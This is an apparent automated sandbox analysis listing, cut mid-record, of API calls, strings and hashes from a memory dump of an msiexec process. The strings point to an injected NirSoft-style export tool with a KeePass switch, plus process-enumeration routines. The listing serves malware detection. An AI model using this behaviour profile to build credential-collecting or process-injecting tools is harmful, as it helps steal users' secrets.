                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                            • memset.MSVCRT ref: 004085CF
                                                                                                            • memset.MSVCRT ref: 004085F1
                                                                                                            • memset.MSVCRT ref: 00408606
                                                                                                            • strcmp.MSVCRT ref: 00408645
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                            • memset.MSVCRT ref: 0040870E
                                                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                            • String ID: ---
                                                                                                            • API String ID: 3437578500-2854292027
                                                                                                            • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                            • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0041087D
                                                                                                            • memset.MSVCRT ref: 00410892
                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 1010922700-0
                                                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                            • malloc.MSVCRT ref: 004186B7
                                                                                                            • free.MSVCRT ref: 004186C7
                                                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                            • free.MSVCRT ref: 004186E0
                                                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                            • malloc.MSVCRT ref: 004186FE
                                                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                            • free.MSVCRT ref: 00418716
                                                                                                            • free.MSVCRT ref: 0041872A
                                                                                                            • free.MSVCRT ref: 00418749
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                                                            • String ID: |A
                                                                                                            • API String ID: 3356672799-1717621600
                                                                                                            • Opcode ID: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                            • Opcode Fuzzy Hash: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp
                                                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                            • API String ID: 2081463915-1959339147
                                                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                            • API String ID: 2012295524-70141382
                                                                                                            • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                            • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                            • API String ID: 667068680-3953557276
                                                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1700100422-0
                                                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                            • String ID:
                                                                                                            • API String ID: 552707033-0
                                                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_snwprintf
                                                                                                            • String ID: %%0.%df
                                                                                                            • API String ID: 3473751417-763548558
                                                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                            • String ID: A
                                                                                                            • API String ID: 2892645895-3554254475
                                                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                            APIs
                                                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                            • memset.MSVCRT ref: 0040DA23
                                                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                            • String ID: caption
                                                                                                            • API String ID: 973020956-4135340389
                                                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                            • API String ID: 1283228442-2366825230
                                                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                            APIs
                                                                                                            • wcschr.MSVCRT ref: 00413972
                                                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                                                            • memset.MSVCRT ref: 004139B8
                                                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                            • memset.MSVCRT ref: 00413A00
                                                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                            • String ID: \systemroot
                                                                                                            • API String ID: 4173585201-1821301763
                                                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscpy
                                                                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                            • API String ID: 1284135714-318151290
                                                                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                            • strchr.MSVCRT ref: 0040C140
                                                                                                            • strchr.MSVCRT ref: 0040C151
                                                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                                                            • memset.MSVCRT ref: 0040C17A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                            • String ID: 4$h
                                                                                                            • API String ID: 4019544885-1856150674
                                                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                            • String ID: 0$6
                                                                                                            • API String ID: 4066108131-3849865405
                                                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004082EF
                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                            • memset.MSVCRT ref: 00408362
                                                                                                            • memset.MSVCRT ref: 00408377
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ByteCharMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 290601579-0
                                                                                                            • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                            • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                            APIs
                                                                                                            • memchr.MSVCRT ref: 00444EBF
                                                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
